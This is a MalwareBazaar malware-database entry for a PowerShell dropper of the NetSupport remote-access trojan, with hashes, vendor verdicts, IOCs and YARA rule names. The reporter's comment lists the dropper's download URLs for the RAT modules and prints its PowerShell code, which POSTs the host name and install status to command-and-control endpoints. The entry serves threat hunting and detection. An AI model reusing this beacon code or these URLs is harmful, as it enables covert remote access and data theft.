MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

NetSupport

Vendor detections: 8

Intelligence 8 IOCs 1 YARA 5 File information Comments

SHA256 hash:	ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52
SHA3-384 hash:	e9eb28ba93b0faa3617a3200bc6d3b055d480a89c73444b44e7d8902d08dc44dce1bb7b8093fe440c768b2c2876ab52f
SHA1 hash:	48b97a2fd63f06ce060bdff02ada6143a43221b7
MD5 hash:	c3a9c69ae58d9f390efcdd39095ec039
humanhash:	iowa-september-nineteen-uniform
File name:	update
Download:	download sample
Signature	NetSupport Create hunting rule
File size:	4'236 bytes
First seen:	2024-09-21 14:10:21 UTC
Last seen:	Never
File type:	ps1
MIME type:	text/plain
ssdeep	48:RHvWvwuwB3QGjsLCO1UD09tD6ZevCO1Uw5NtDPYPkQ0bISOI03VJ8dHtLbLvlCO7:RhbYs09w4rFBEnD8dHtLXROzBCSIOI
Threatray	612 similar samples on MalwareBazaar
TLSH	T13F9165134527A05982298FE3654A7A19DF7A40BF98762165BEF81C0E2EF007D47EEC9C
Magika	powershell
Reporter	NDA0E
Tags:	barsukenotikejik-com enotikkrolikzayac-com NetSupport ps1

NDA0E

Downloads NetSupport modules from:
https://update-ledger.net/ns/AudioCapture.dll
https://update-ledger.net/ns/HTCTL32.DLL
https://update-ledger.net/ns/NSM.LIC
https://update-ledger.net/ns/NSM.ini
https://update-ledger.net/ns/PCICHEK.DLL
https://update-ledger.net/ns/PCICL32.DLL
https://update-ledger.net/ns/TCCTL32.DLL
https://update-ledger.net/ns/client32.exe
https://update-ledger.net/ns/client32.ini
https://update-ledger.net/ns/msvcr100.dll
https://update-ledger.net/ns/nskbfltr.inf
https://update-ledger.net/ns/nsm_vpro.ini
https://update-ledger.net/ns/pcicapi.dll
https://update-ledger.net/ns/remcmdstub.exe

C2 URLs:
https://update-ledger.net/info2.php
https://update-ledger.net/info3.php

POST requests sent to C2:
$yyx = $env:COMPUTERNAME
$filePath1 = "$env:APPDATA\Net\client32.exe"
$filePath2 = "$env:APPDATA\Net\client32.ini"

$yyxy = if ((Test-Path $filePath1) -and (Test-Path $filePath2)) { "OK" } else { "Fail" }

$body = @{
'yyx' = $yyx
'yyxy' = $yyxy
}

Invoke-RestMethod -Uri 'https://update-ledger.net/info2.php' -Method POST -Body $body -Headers @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.4962.126 Safari/537.36 OPR/79.0.4066.89' } -ErrorAction SilentlyContinue

$requestBody = @{
'computerName' = $localComputerName
'folderStatus' = if ($detectedFolders.Count -gt 0) { "OK" } else { "Fail" }
'detectedFolders' = $folderOutput
}

Invoke-RestMethod -Uri 'https://update-ledger.net/info3.php' -Method POST -Body $requestBody -Headers @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.4962.126 Safari/537.36 OPR/79.0.4066.89' } -ErrorAction SilentlyContinue

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOC	ThreatFox Reference
95.164.115.224:2080	https://threatfox.abuse.ch/ioc/1327129/

Intelligence

File Origin

# of uploads :

# of downloads :

Origin country :

Vendor Threat Intelligence

Verdict:

Malicious

Score:

98.2%

Link:

https://cyber-fortress.com/docs/result/index.php?id=66ef0c74f129e67ada9045d1

Tags:

Generic Infostealer Stealth Trojan

Verdict:

Likely Malicious

Threat level:

7.5/10

Confidence:

100%

Tags:

dropper

Link:

https://www.filescan.io/uploads/66eed3fb979c2df18385c234/reports/4db7dca1-c5a8-4516-8ff9-ee5bca0cd6a4/overview

Verdict:

Unknown

Link:

https://www.hybrid-analysis.com/sample/ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52

Result

Verdict:

UNKNOWN

Result

Threat name:

NetSupport RAT

Detection:

malicious

Classification:

troj

Score:

72 / 100

Link:

https://www.joesandbox.com/analysis/1515143

Signature

AI detected suspicious sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Powershell drops PE file

Sigma detected: Powershell drops NetSupport RAT client

Behaviour

Behavior Graph:

Download SVG

Score:

93%

Verdict:

Malware

File Type:

SCRIPT

Link:

https://malprob.io/report/ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52/

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=zsyzs3jkfnl3sq3bdkesrjnalvuqaoysew42732a4iibpxtqxzja._file

Verdict:

malicious

Label(s):

netsupportmanagerrat

NetSupport

3147cff71a5dadb3a98d294cb54a32e0b8ff6f6c777de3d5a5d03aaf63be130e

NetSupport

629463eeaf09ac3f51a7adf9c29d43b73f06bb92448243f6c9b8c7b9c1efbcd5

NetSupport

92038361b62ea184798602abbd17963ea36f3e4441a3981a8156cc286bccb027

NetSupport

980fcb6365092cd752934417abb0f2a95bca452c58856240157107e70c1d754d

NetSupport

a82cff6bab731179fbc7be78fccab6bbf690aef5978b0ea489840b2e10fc3df5

NetSupport

ce15d5dc596387515a6efad0fffa352d1fa10365b223d07cb50019c4c8d23652

NetSupport

ea35797a9556636378031645a48f089087cd258f8e40e1399aa371b2cca3cb7f

NetSupport

+ 602 additional samples on MalwareBazaar

Result

Malware family:

netsupport

Score:

10/10

Tags:

family:netsupport discovery execution persistence rat

Link:

https://tria.ge/reports/240921-ws6bbswbjd/

Behaviour

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Adds Run key to start application

Executes dropped EXE

Loads dropped DLL

Blocklisted process makes network request

Downloads MZ/PE file

NetSupport

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

Legit

Score:

0.00

Link:

https://yomi.yoroi.company/submissions/ccb1996d2a2b57b943611a8928a5a05d69003b1225b9afef40e21017de70be52

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:	Detect_APT29_WINELOADER_Backdoor Create hunting rule
Author:	daniyyell
Description:	Detects APT29's WINELOADER backdoor variant used in phishing campaigns, this rule also detect bad pdf,shtml,htm and vbs or maybe more depends
Reference:	https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties

Rule name:	Detect_Malicious_VBScript_Base64 Create hunting rule
Author:	daniyyell
Description:	Detects malicious VBScript patterns, including Base64 decoding, file operations, and PowerShell.

Rule name:	detect_powershell Create hunting rule
Author:	daniyyell
Description:	Detects suspicious PowerShell activity related to malware execution

Rule name:	Detect_PowerShell_Obfuscation Create hunting rule
Author:	daniyyell
Description:	Detects obfuscated PowerShell commands commonly used in malicious scripts.

Rule name:	Disable_Defender Create hunting rule
Author:	iam-py-test
Description:	Detect files disabling or modifying Windows Defender, Windows Firewall, or Microsoft Smartscreen